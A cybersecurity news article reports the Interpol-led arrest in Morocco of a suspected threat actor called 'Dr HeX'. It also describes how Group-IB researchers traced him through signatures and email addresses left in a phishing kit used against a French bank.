A Moroccan man suspected of being “Dr HeX” – the prolific threat actor behind a nine-year cyber-blitz on thousands of victims through phishing, website defacing, malware development, fraud and carding – has been arrested.
Interpol announced the bust – which took place in Morocco in May – on Tuesday, describing it as the result of a joint two-year probe dubbed Operation Lyrebird that saw Interpol working closely with the Moroccan police and security firm Group-IB.
The unnamed suspect allegedly helped to develop carding and phishing kits to sell on criminal online forums. One example of a carding site is Joker’s Stash, which was taken down in December. It was a popular cybercriminal destination that specialized in trading in payment-card data, offering millions of stolen credit and debit cards to buyers.
As described in Interpol’s announcement, the buyers of Dr HeX’s carding and phishing kits used them to masquerade as online-banking facilities, allowing the suspect and others “to steal sensitive information and defraud trusting individuals for financial gain, with the losses of individuals and companies published online in order to advertise these malicious services.”
We saw one such example of how the carding economy works in October, when Dallas-based smoked-meat franchise Dickey’s Barbecue Pit saw 3 million customer payment cards turn up on the site. Anyone purchasing the information could create cloned cards to physically use at ATMs or at in-store machines that aren’t chip-enabled; or, they can simply use the information to buy things online.
According to a writeup from Group-IB, the suspect was allegedly involved in attacks on 134 websites over the course of nine years, from 2009-2018, leaving his signature “Dr HeX” nickname on the attacked web pages. Dr HeX was just one of the nicknames the suspect allegedly used, but that’s the one that the security firm chose to dub the threat actor whom they tracked.
Squeezing an Identity Out of a Phishing Kit
The starting point for Group-IB researchers’ quest to track down and to unmask Dr HeX was the extraction of a phishing kit, which is a tool used to create phishing web pages. That phishing kit was being used to exploit the brand of a large French bank, according to their writeup.
The phishing kit used a typical setup, they described: It included “the creation of a spoofed website of a targeted company, the mass distribution of emails impersonating it and asking users to enter login information on the spoofed site. The credentials left by unsuspecting victims on the fake page were then redirected to the perpetrator’s email.”
Almost all of the scripts contained in the phishing kit were signed with the signature of their creator, Dr HeX, and had a contact email address.
Dr HeX liked that nickname quite a bit: Group-IB researchers found that the alleged attacker’s YouTube channel was signed under that same name. In one of the YouTube videos on his channel, the attacker also left a link leading to an Arabic crowdfunding platform. That gave Group-IB researchers another hook up to the alleged cybercriminal.
The name was also used to register “at least” two domains that were created with the email found in the phishing kit, Group-IB said.
Based on the email address from the phishing kit, researchers identified other elements of the threat actor’s malicious infrastructure; five email addresses were associated with the suspect; a total of six nicknames; and then there were his accounts on Facebook, Instagram, Skype and YouTube.
Between 2009 and 2018, analysts found that Dr HeX defaced over 130 web pages. They also discovered the cybercriminal’s posts “on several popular underground platforms intended for malware trading that indicate the latter’s involvement in malware development,” according to Group-IB. Analysts also found evidence that might link Dr HeX to attacks on “several huge French corporations” with the aim of “stealing customer’s bank-card data.”
Group-IB’s post quoted Stephen Kavanagh, Interpol executive director of police services, who called Operation Lyrebird “a significant success against a suspect who is accused of targeting unsuspecting individuals and companies across multiple regions for years.”
“The case highlights the threat posed by cybercrime worldwide,” Kavanagh continued. “The arrest of this suspect is down to outstanding international investigative work and new ways of collaboration, both with Moroccan police and our vital private sector partners such as Group-IB.”
Check out our free upcoming live and on-demand webinar events – unique, dynamic discussions with cybersecurity experts and the Threatpost community.